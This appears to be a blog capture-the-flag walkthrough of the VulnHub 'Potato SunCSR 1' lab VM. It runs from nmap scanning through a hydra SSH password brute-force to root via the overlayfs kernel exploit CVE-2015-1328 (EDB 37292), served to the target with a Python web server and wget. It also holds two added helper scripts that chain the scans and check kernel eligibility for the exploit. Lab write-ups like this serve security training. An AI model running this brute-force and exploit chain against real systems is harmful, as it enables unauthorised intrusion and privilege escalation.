Target: https://www.vulnhub.com/entry/potato-suncsr-1,556/
1. Host discovery + information gathering
nmap -sn 192.168.25.0/24
or
arp-scan -l
Target IP: 192.168.25.163
Set an environment variable for it:
export ip=192.168.25.163
Port scan (all 65535 TCP ports):
nmap --min-rate 10000 -p- $ip
PORT     STATE SERVICE
80/tcp   open  http
7120/tcp open  unknown
MAC Address: 00:0C:29:82:3B:39 (VMware)
Service information gathering (version and OS detection on the two open ports only):
nmap -sS -sV -O -p80,7120 $ip
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
7120/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
MAC Address: 00:0C:29:82:3B:39 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Script scan with the vuln category:
nmap --script=vuln -p80,7120 $ip
PORT     STATE SERVICE
80/tcp   open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum:
|_  /info.php: Possible information file
7120/tcp open  unknown
MAC Address: 00:0C:29:82:3B:39 (VMware)
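The full-range sweep and the targeted -sV/-O scan above are normally chained rather than retyped. The shell snippet below is an added example and is not part of the original post: it parses the open TCP ports out of nmap's normal output and builds the follow-up command from them. SAMPLE_NMAP is a constructed copy of the sweep output (the latency and "Not shown" lines are made up); recon is the live pipeline and assumes nmap is installed and you are root for -sS/-O.

```shell
#!/bin/sh
# Added example (not from the original post): feed the open ports found by the full-range
# sweep straight into the targeted service/OS scan instead of retyping them.

# Constructed sample of `nmap --min-rate 10000 -p- $ip` normal output (not real scan data)
SAMPLE_NMAP='Nmap scan report for 192.168.25.163
Host is up (0.00045s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
7120/tcp open  unknown
MAC Address: 00:0C:29:82:3B:39 (VMware)'

# open_ports: read nmap normal output on stdin, print open TCP ports as "80,7120" (nmap -p syntax).
# Filtered/closed ports are skipped on purpose: -sV against them wastes time and tells you nothing.
open_ports() {
  awk '$1 ~ /^[0-9]+\/tcp$/ && $2 == "open" { printf "%s%s", sep, substr($1, 1, index($1, "/") - 1); sep = "," }
       END { print "" }'
}

# followup_cmd TARGET: build the service/OS scan line for the ports read on stdin; fails if none are open.
followup_cmd() {
  ports=$(open_ports)
  [ -n "$ports" ] || return 1
  echo "nmap -sS -sV -O -p$ports $1"
}

# recon TARGET: the live pipeline (sweep, then targeted scan). Needs root for -sS and -O.
recon() {
  cmd=$(nmap --min-rate 10000 -p- "$1" | followup_cmd "$1") || { echo "no open TCP ports on $1" >&2; return 1; }
  echo "running: $cmd" >&2
  $cmd
}

# Offline demonstration on the constructed sample; prints the command recon would run.
echo "$SAMPLE_NMAP" | followup_cmd 192.168.25.163
```

On the sample this prints `nmap -sS -sV -O -p80,7120 192.168.25.163`, the same targeted scan the post runs by hand; `recon $ip` does both steps against a live host.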
2. Starting the penetration test
Visit port 80
A static image page, very much CTF style.
potato

Note the web fingerprint for the record.

Viewing the page source turns up nothing either, so we brute-force directories:
gobuster dir -u http://192.168.25.163/ -w /usr/share/dirbuster/wordlists/medium.txt
That run found nothing. A second scan (output in dirb format) did:
---- Scanning URL: http://192.168.25.163/ ----
+ http://192.168.25.163/index.html (CODE:200|SIZE:654)
+ http://192.168.25.163/info.php (CODE:200|SIZE:87513)
+ http://192.168.25.163/server-status (CODE:403|SIZE:294)
http://192.168.25.163/info.php
We have a leaked phpinfo page. It discloses the PHP version, loaded modules and filesystem paths, but nothing that gives a foothold on its own, so the only avenue left is brute-forcing SSH.
Brute-forcing port 7120
Brute-force SSH with hydra. The only candidate username we have so far is potato, so use that:
hydra -l potato -P /usr/share/wordlists/john.lst ssh://192.168.25.163:7120

This gives us the password letmein.
3. Getting an initial foothold
Connect over SSH to port 7120, using -p to specify the non-default port:
ssh potato@192.168.25.163 -p 7120

4. Privilege escalation
Basic situational awareness first:
id
ip addr
uname -a
Linux ubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
The kernel is old: Linux ubuntu 3.13.0, built in April 2014.
Look for an EXP directly:
searchsploit Linux ubuntu 3.13.0

Plenty of hits; download the first one, EDB-ID 37292:
searchsploit -m 37292

Since this is a local privilege-escalation exploit, it has to be transferred to the target.
Start a web server on the attacking machine:
python3 -m http.server 10000
Then fetch the file on the target with wget.
On the target, change to /tmp first; we have no write permission in the other directories.

Read the usage notes at the top of the file:
head -n 20 37292.c
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*

CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
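Before running a kernel exploit it is worth confirming the target really sits inside the window the header describes; a bad match can panic the box instead of giving root. The script below is an added example, not code from the post or from 37292.c. It parses a uname -a banner for the release and build date and compares the date against the 2015-06-15 cutoff the header states. The 3.13 to 3.19 major.minor range and the -Ubuntu build-tag check are my assumptions derived from the releases the header lists; TARGET_BANNER is the banner quoted in the post, PATCHED_BANNER is made up, and runtime_checks is meant to be run on the target itself (it assumes util-linux unshare is present).

```shell
#!/bin/sh
# Added example (not from the original post or from 37292.c): decide from a `uname -a` banner
# whether a kernel sits inside the window the exploit header names ("Kernels before 2015-06-15",
# Ubuntu builds). The 3.13..3.19 range and the -Ubuntu tag check are assumptions, not from the post.

# Banner of the target as quoted in the post
TARGET_BANNER='Linux ubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux'
# Constructed banner for a later, patched Ubuntu kernel (made up for the example)
PATCHED_BANNER='Linux box 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux'

# month_num Apr -> 04 ; fails on anything that is not an English month abbreviation
month_num() {
  case "$1" in
    Jan) echo 01;; Feb) echo 02;; Mar) echo 03;; Apr) echo 04;;
    May) echo 05;; Jun) echo 06;; Jul) echo 07;; Aug) echo 08;;
    Sep) echo 09;; Oct) echo 10;; Nov) echo 11;; Dec) echo 12;;
    *) return 1;;
  esac
}

# build_date BANNER -> YYYYMMDD taken from the "Thu Apr 10 19:11:08 UTC 2014" part of uname -a
build_date() {
  set -- $1
  while [ $# -ge 6 ]; do
    case "$1" in
      Mon|Tue|Wed|Thu|Fri|Sat|Sun)
        m=$(month_num "$2") || return 1
        printf '%s%s%02d\n' "$6" "$m" "$3"
        return 0;;
    esac
    shift
  done
  return 1
}

# kernel_release BANNER -> third field of uname -a, e.g. 3.13.0-24-generic
kernel_release() {
  set -- $1
  echo "$3"
}

# ofs_candidate BANNER: exit 0 when it is an Ubuntu 3.13..3.19 build dated before 2015-06-15
ofs_candidate() {
  rel=$(kernel_release "$1")
  bd=$(build_date "$1") || return 1
  major=${rel%%.*}
  rest=${rel#*.}
  minor=${rest%%.*}
  case "$1" in *-Ubuntu*) ;; *) return 1;; esac
  [ "$major" -eq 3 ] && [ "$minor" -ge 13 ] && [ "$minor" -le 19 ] && [ "$bd" -lt 20150615 ]
}

# runtime_checks: run on the target itself. The exploit mounts overlayfs inside a user
# namespace, so both have to be usable by an unprivileged user for it to work.
runtime_checks() {
  if grep -qE 'overlay(fs)?$' /proc/filesystems 2>/dev/null; then
    echo "overlayfs: listed in /proc/filesystems"
  else
    echo "overlayfs: not listed (module may still load on first mount)"
  fi
  if unshare -U true 2>/dev/null; then
    echo "user namespaces: unprivileged clone works"
  else
    echo "user namespaces: blocked for this user"
  fi
}

for b in "$TARGET_BANNER" "$PATCHED_BANNER"; do
  if ofs_candidate "$b"; then
    echo "candidate: $(kernel_release "$b") built $(build_date "$b")"
  else
    echo "not a candidate: $(kernel_release "$b") built $(build_date "$b")"
  fi
done
```

On the target, `ofs_candidate "$(uname -a)" && runtime_checks` gives a quick yes/no before you spend time compiling; the date check is the same criterion the header states, the release range just narrows the false positives.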
The header says the exploit covers Ubuntu kernels built before 2015-06-15; our 3.13.0-24 kernel from 2014-04-10 is inside that window, which is worth checking first because a mismatched kernel exploit can crash the box rather than give root.
Compile on the target with gcc 37292.c -o 37292
Run it with ./37292
Privilege escalation succeeded.

Unless otherwise stated, all articles on this blog are the author's original work.
If reposting, please credit the source: https://www.oneblanks.xyz/potato-suncsr%e9%9d%b6%e6%9c%ba%e7%bb%83%e4%b9%a0/